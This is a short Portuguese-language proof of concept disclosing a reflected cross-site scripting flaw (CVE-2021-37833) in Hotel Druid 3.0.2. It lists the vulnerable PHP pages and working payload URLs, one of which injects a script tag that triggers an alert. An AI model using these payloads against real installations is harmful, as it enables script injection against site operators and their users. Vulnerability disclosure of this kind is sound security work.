
Prova de conceito para uma vulnerabilidade de cross-site scripting refletido (XSS) no Hotel Druid 3.0.2, demonstrando execução arbitrária de JavaScript através de múltiplas páginas PHP vulneráveis.
Uma vulnerabilidade de Cross Site Scripting refletido existe em várias páginas da versão 3.0.2 do aplicativo Hotel Druid, que permite a execução arbitrária de comandos JavaScript. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37833
Páginas PHP vulneráveis:
crea_modelli.php - parâmetro cambia_frasi visualizza_tabelle.php - parâmetro de URL arbitrário tabella.php - parâmetro de URL arbitrário storia_soldi.php - parâmetro de URL arbitrário
Payloads vulneráveis
/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1
/storia_soldi.php?piu17">e3esq=1
/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(%27xss%20hotel%20druid%27)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1
/tabella.php?jkuh3">yql8b=1
Descoberto por Joe Helle, julho de 2021